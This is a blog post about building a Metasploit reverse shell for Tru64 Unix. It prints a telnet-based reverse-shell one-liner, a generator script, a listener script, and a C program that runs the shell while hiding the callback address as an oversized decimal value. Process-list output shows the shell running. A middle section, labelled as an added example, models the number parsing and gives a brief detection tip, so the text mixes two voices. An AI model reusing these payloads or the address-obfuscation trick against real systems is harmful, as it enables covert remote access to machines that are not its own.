Tru64 Unix V5.1 Metasploit payloads pt.2

I decided to check once again which of the current msfvenom payloads could be suitable for Tru64 Unix, and confirmed that only cmd/unix/reverse works reliably enough on this platform.

Some years ago I experimented a little with this (here); now I wanted to share some interesting findings.

So, dusting off the old ways, I created a simple script that generates the cmd/unix/reverse shell script for Tru64 via msfvenom:

#!/bin/bash
# Generate the cmd/unix/reverse one-liner for Tru64 with msfvenom.
echo -e "What IP are we gonna use ? \c"
read IP
echo -e "What Port Number are we gonna listen to? : \c"
read port
# cmd/* payloads are plain shell text, so EXITFUNC (a native-payload option) does nothing here and is left out.
./msfvenom -p cmd/unix/reverse LHOST="$IP" LPORT="$port" > default.exe
chmod +x default.exe; ls -la default.exe
echo "Done..."

The script produces the following one-liner (the IP address is my lab listener):

sh -c '(sleep 9000|telnet 192.168.11.2 9000|while : ; do sh && break; done 2>&1|telnet 192.168.11.2 9000 >/dev/null 2>&1 &)'

This works fine: execute it on a Tru64 system that can reach 192.168.11.2 and you get your reverse shell on the listener and can do whatever you like.

But I did not like the plain-text IP address sitting in the script, so I looked into ways to obfuscate it. The first thing that came to mind was a simple C program that calls the command above.

If you wrap it in a primitive (and unsafe) system() call in C, for example:

system("sh -c '(sleep 9000|telnet 192.168.11.2 9000|while : ; do sh && break; done 2>&1|telnet 192.168.11.2 9000 >/dev/null 2>&1 &)'");

the compiled program runs just fine, but 192.168.11.2 is still plainly visible: the telnet arguments show up in the ps process list, and strings run on the compiled binary prints the whole command.

To hide the IP address we can use an old trick: writing the IPv4 address as a single decimal value.

An IPv4 address is written in dotted-octet notation. Each octet is a decimal value from 0 to 255, which gives 256 possible values per octet (one byte), and the four octets are simply the four bytes of one 32-bit number, most significant first.
Calculating the decimal value of an IPv4 address is therefore easy. Number the octets from left to right as $octet1, $octet2, $octet3 and $octet4, weight each one by its power of 256 and add the results:
$octet1 x (256^3) = $decimal1
$octet2 x (256^2) = $decimal2
$octet3 x (256) = $decimal3
$octet4 = $decimal4
$decimal1 + $decimal2 + $decimal3 + $decimal4 = $decimal_equivalent
For example, converting IP address 192.168.11.2 to its decimal equivalent looks like this:
192 x (256^3) = 192 x 16777216 = 3221225472
168 x (256^2) = 168 x 65536 = 11010048
11 x 256 = 2816
2 = 2
3221225472 + 11010048 + 2816 + 2 = 3232238338
The decimal equivalent of 192.168.11.2 is 3232238338, which is 0xC0A80B02 in hex, i.e. the four octets C0 A8 0B 02 back to back.

Now this value, 3232238338, is pingable and ssh-able from a normal system, because inet_aton() also accepts a bare number as a 32-bit address:

user@X201:~ > ping 3232238338
PING 3232238338 (192.168.11.2) 56(84) bytes of data.
64 bytes from 192.168.11.2: icmp_seq=1 ttl=64 time=66.1 ms
64 bytes from 192.168.11.2: icmp_seq=2 ttl=64 time=88.5 ms
^C
--- 3232238338 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 66.164/77.332/88.500/11.168 ms

On modern systems (64-bit Linux, 64-bit Windows 8/10) the decimal form cannot go higher than 4294967295 (2^32 - 1, i.e. 255.255.255.255):

user@X201:~ > ping 4294967295
Do you want to ping broadcast? Then -b
user@X201:~ > ping 4294967296
ping: unknown host 4294967296

But not so on old commercial UNIXes :) For example, on Tru64 you can go way over the 4294967295 limit with your decimal value and the system will somehow still calculate the IP address just fine.

So I played a little with numbers and came up with the following monster decimal value, which equals 192.168.11.2 on Tru64:

323223578232322357823232235782323223578232322357823232235782323223578232322357823230111689410002322357823230111123223578232301112322357823230111232235782323011123223578232301112322357667040002

On Tru64 (emulated on emuvm, not a physical box) anything higher than this will coredump the telnet session, so this is a safe value that I have tested to get a reverse connection to the Metasploit listener.
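Why the oversized value still resolves can be seen by modelling the two ways a libc can turn a bare decimal string into an address. A careful parser (the behaviour the Linux ping output above shows) accumulates the digits and rejects anything above 4294967295. An unchecked one accumulates into a 32-bit unsigned that silently wraps, which makes the result the number modulo 2^32; and because 10^32 is divisible by 2^32, only the last 32 digits of the string matter. The 192-digit value above reduces to 3232238338 that way, which is exactly 192.168.11.2, so a wrapping accumulator is the model consistent with what the post observes on Tru64 (an inference from the number itself, not a reading of the Tru64 libc source). The C program below is an added example, not the author's code and not taken from any platform's libc: it implements both parsers, the dotted/decimal conversion from the previous section, and make_alias(), an assumed helper that produces your own oversized alias for any address by adding multiples of 2^32.

```c
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Sentinel for "not a valid address string". */
#define BAD_ADDR (-1LL)

/* The 192-digit value from the post, split into adjacent string literals
 * so each chunk can be checked against the original. */
static const char TRU64_MONSTER[] =
    "3232235782" "3232235782" "3232235782" "3232235782"
    "3232235782" "3232235782" "3232235782" "3232235782"
    "3230111689410002"
    "3223578232" "3011112322" "3578232301" "1123223578" "2323011123"
    "2235782323" "0111232235" "7823230111" "2322357667" "040002";

/* Dotted quad -> decimal: o1*256^3 + o2*256^2 + o3*256 + o4.
 * Returns BAD_ADDR unless the string is exactly four octets in 0..255. */
long long dotted_to_decimal(const char *dotted)
{
    unsigned o[4];
    char trailing;
    if (sscanf(dotted, "%u.%u.%u.%u%c", &o[0], &o[1], &o[2], &o[3], &trailing) != 4)
        return BAD_ADDR;
    for (int i = 0; i < 4; i++)
        if (o[i] > 255)
            return BAD_ADDR;
    return ((long long)o[0] << 24) | (o[1] << 16) | (o[2] << 8) | o[3];
}

/* Decimal -> dotted quad, written into buf (at least 16 bytes); returns buf. */
char *decimal_to_dotted(uint32_t v, char *buf)
{
    snprintf(buf, 16, "%u.%u.%u.%u", (unsigned)(v >> 24), (unsigned)((v >> 16) & 255),
             (unsigned)((v >> 8) & 255), (unsigned)(v & 255));
    return buf;
}

/* Strict parse of a bare decimal host string: the behaviour the post shows on
 * Linux, where anything above 4294967295 is rejected ("unknown host"). */
long long parse_decimal_strict(const char *s)
{
    uint64_t val = 0;
    if (*s == '\0') return BAD_ADDR;
    for (; *s; s++) {
        if (!isdigit((unsigned char)*s)) return BAD_ADDR;
        val = val * 10 + (uint64_t)(*s - '0');
        if (val > 0xFFFFFFFFULL) return BAD_ADDR;   /* does not fit a 32-bit address */
    }
    return (long long)val;
}

/* Unchecked parse: the accumulator is a 32-bit unsigned that wraps silently,
 * so the result is the number modulo 2^32. This is the model that reproduces
 * the Tru64 result in the post (inferred from the value, not from Tru64's libc). */
long long parse_decimal_wrapping(const char *s)
{
    uint32_t val = 0;
    if (*s == '\0') return BAD_ADDR;
    for (; *s; s++) {
        if (!isdigit((unsigned char)*s)) return BAD_ADDR;
        val = val * 10u + (uint32_t)(*s - '0');     /* wraps at 2^32, no check */
    }
    return (long long)val;
}

/* Assumed helper: an alias for ip that only a wrapping parser decodes correctly,
 * i.e. any value congruent to ip modulo 2^32; here ip + k * 2^32. */
uint64_t make_alias(uint32_t ip, uint32_t k)
{
    return (uint64_t)ip + ((uint64_t)k << 32);
}

/* Render a 64-bit value as decimal text (buf needs at least 21 bytes); returns buf. */
char *u64_to_str(uint64_t v, char *buf)
{
    sprintf(buf, "%llu", (unsigned long long)v);
    return buf;
}

int main(void)
{
    char ip[16], num[24];
    long long d = dotted_to_decimal("192.168.11.2");
    printf("192.168.11.2 -> %lld -> %s\n", d, decimal_to_dotted((uint32_t)d, ip));
    printf("strict   4294967295 -> %lld\n", parse_decimal_strict("4294967295"));
    printf("strict   4294967296 -> %lld (rejected)\n", parse_decimal_strict("4294967296"));
    printf("wrapping 4294967296 -> %lld\n", parse_decimal_wrapping("4294967296"));
    d = parse_decimal_wrapping(TRU64_MONSTER);
    printf("wrapping 192-digit value -> %lld = %s\n", d, decimal_to_dotted((uint32_t)d, ip));
    u64_to_str(make_alias(3232238338u, 1), num);
    printf("alias %s -> strict %lld, wrapping %lld\n", num,
           parse_decimal_strict(num), parse_decimal_wrapping(num));
    return 0;
}
```

Compile with cc and run. Any value congruent to 3232238338 modulo 2^32 (7527205634, 11822172930, and so on) decodes to 192.168.11.2 under the wrapping parser and is rejected by the strict one. That asymmetry is also the simplest way to spot the trick from the defender's side: a purely numeric host argument to telnet, ssh or ping that does not fit in 32 bits is worth a second look.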

Here is my (lame) C source code for the Tru64 payload executable:

#include <stdio.h>
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* sleep() */

/* 192.168.11.2 as the oversized decimal value that Tru64 accepts; used in the telnet command below. */
#define DECIMAL_IP "323223578232322357823232235782323223578232322357823232235782323223578232322357823230111689410002322357823230111123223578232301112322357823230111232235782323011123223578232301112322357667040002"

int main(void)
{
    system("/usr/bin/clear");
    printf("[*] Starting the Metasploit Framework connector for Tru64 ");
    sleep(1); printf("."); fflush(stdout);
    sleep(1); printf(".."); fflush(stdout);
    sleep(1); printf("..."); fflush(stdout);
    sleep(1); printf("...."); fflush(stdout);
    printf("\n[*] Connecting to target");
    printf("\n[*] Using the decimal number trick to obfuscate the IP");
    printf("\n[*] In this example it is the following value that passes for IP 192.168.11.2");
    printf("\n-----------------------------------------------------------------------------");
    printf("\n32322357823232235782323223578232322357823232235782323223578232322357823232235");
    printf("\n78232301116894100023223578232301111232235782323011123223578232301112322357823");
    printf("\n23011123223578232301112322357667040002");
    sleep(1);
    fflush(stdout);
    /* The msfvenom cmd/unix/reverse one-liner with the dotted IP replaced by DECIMAL_IP;
     * the backgrounded subshell keeps the reverse connection alive after this program exits. */
    system("/sbin/sh -c '(/sbin/sleep 9000| /usr/bin/telnet " DECIMAL_IP " 9000|"
           "while : ; do /sbin/sh && break; done 2>&1| /usr/bin/telnet " DECIMAL_IP " 9000 > /dev/null 2>&1 &)'");
    printf("\n[*] Executing the payload ");
    sleep(1); printf("."); fflush(stdout);
    sleep(1); printf(".."); fflush(stdout);
    sleep(1); printf("..."); fflush(stdout);
    printf("\nChecking the telnet process in ps tree\n");
    fflush(stdout);   /* flush before system() so the ps output lands after our text */
    system("/sbin/ps -ef | grep /usr/bin/telnet");
    return 0;
}

Compilation is done via cc on Tru64 like so

cc file.c -o file.exe

And the Metasploit listener shell script looks like this:

#!/bin/bash
echo -e "What IP are we gonna listen to ? \c"
read host
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo "Starting the cmd/unix/reverse handler.."
# Write a one-line wrapper around msfconsole and run it.
echo "./msfconsole -x \"use exploit/multi/handler; set PAYLOAD cmd/unix/reverse; set LHOST $host; set LPORT $port; run\"" > run.listener.sh
chmod +x run.listener.sh
./run.listener.sh

Once the binary is executed on Tru64, the connection is established on your listener and a really strange-looking telnet call shows up in the ps listing:

root 921 1 0.0 20:55:11 ?? 0:03.43 /usr/opt/java131/bin/../bin/alpha/native_threads/java -classic -mx2m -Dos.version=boot authentication.server.AuthenticationServer
root 948 1 0.0 20:55:15 ?? 0:05.74 /usr/sbin/smsd -d
root 989 1 0.0 20:56:04 ?? 1:44.99 Xvnc :1 -desktop X -httpd /usr/local/vnc/classes -auth /home/root/.Xauthority -geometry 1024x700 -depth 16 -rfbwait 120000 -rfbauth /home/root/.vnc/passwd -rfbport 5901
root 992 1 0.0 20:56:08 ?? 0:00.80 /usr/dt/bin/dtsession
root 1020 1 0.0 20:56:11 ?? 0:00.19 /usr/dt/bin/ttsession -s
root 1021 810 0.0 20:56:11 ?? 0:00.39 rpc.ttdbserverd
root 1029 992 0.0 20:56:14 ?? 0:06.24 dtwm
root 1030 992 0.0 20:56:17 ?? 0:00.52 /usr/bin/X11/dxconsole
root 1031 992 0.0 20:56:17 ?? 0:01.81 dtfile -session dtHppbgQ
root 1033 1031 0.0 20:56:35 ?? 0:00.00 dtfile -session dtHppbgQ
root 1039 1031 0.0 20:56:43 ?? 0:00.17 /usr/dt/bin/dtexec -open 0 -ttprocid 3.1OqjRR 01 1020 1342177279 1 1 0 10.0.2.10 4_102_1 xterm -bg black -fg green
root 1040 1039 0.0 20:56:43 ?? 0:04.76 xterm -bg black -fg green
root 1256 1031 0.0 21:45:00 ?? 0:00.17 /usr/dt/bin/dtexec -open 0 -ttprocid 3.1OqjRR 01 1020 1342177279 1 1 0 10.0.2.10 4_104_1 xterm -bg black -fg green
root 1257 1256 0.0 21:45:00 ?? 0:00.63 xterm -bg black -fg green
root 1495 1 0.0 22:27:21 ?? 0:00.02 /sbin/sleep 9000
root 1520 1 0.0 22:41:41 console 0:00.05 /usr/sbin/getty console console vt100
root 1041 1040 0.0 20:56:44 pts/1 0:05.26 -csh (tcsh)
root 1323 1 0.0 21:52:01 pts/1 0:00.02 /sbin/sleep 9000
root 1395 1 0.0 22:05:35 pts/1 0:00.02 /sbin/sleep 9000
root 1551 1 0.0 23:05:06 pts/1 0:00.03 /usr/bin/telnet 323223578232322357823232235782323223578232322357823232235782323223578232322357823230111689410002322357823230111123223578232301112322357823230111232235782323011123223578232301112322357667040002 9000
root 1552 1551 0.0 23:05:06 pts/1 0:00.02 /sbin/sleep 9000
root 1553 1551 0.0 23:05:06 pts/1 0:00.02 /usr/bin/telnet 323223578232322357823232235782323223578232322357823232235782323223578232322357823230111689410002322357823230111123223578232301112322357823230111232235782323011123223578232301112322357667040002 9000
root 1554 1551 0.0 23:05:06 pts/1 0:00.00 /sbin/sh -c (/sbin/sleep 9000| /usr/bin/telnet 323223578232322357823232235782323223578232322357823232235782323223578232322357823230111689410002322357823230111123223578232301112322357823230111232235782323011123223578232301112322357667040002 9000|while : ; do /sbin/sh && break; done 2>&1| /usr/bin/telnet 323223578232322357823232235782323223578232322357823232235782323223578232322357823230111689410002322357823230111123223578232301112322357823230111232235782323011123223578232301112322357667040002 9000 > /dev/null 2>&1 &)
root 1555 1554 0.0 23:05:07 pts/1 0:00.01 /sbin/sh
root 1561 1555 0.0 23:05:30 pts/1 0:00.14 ps -ef
root 1258 1257 0.0 21:45:00 pts/2 0:00.29 -csh (tcsh)
root 1285 1 0.0 21:47:18 pts/2 0:00.02 /sbin/sleep 9000

This IP trick works on AIX and Tru64; Solaris is not affected by it. I have had no chance yet to verify HP-UX, but I bet it will work there too.

And of course a movie at the end, to see how it works in real life:

And an audio equivalent would be this

P.S

Greetings to Markus (you know who you are) for the Alpha VMS and Tru64 inspiration many years ago !

P.P.S

Rotten dried fish that Sasha was eating, and the flying nails when he was clipping ’em brings back nice memories :)

P.P.P.S

Fuqz go to Ron, Luigi, Aram, John and the biggest fucker BILL ! (you know who you are)
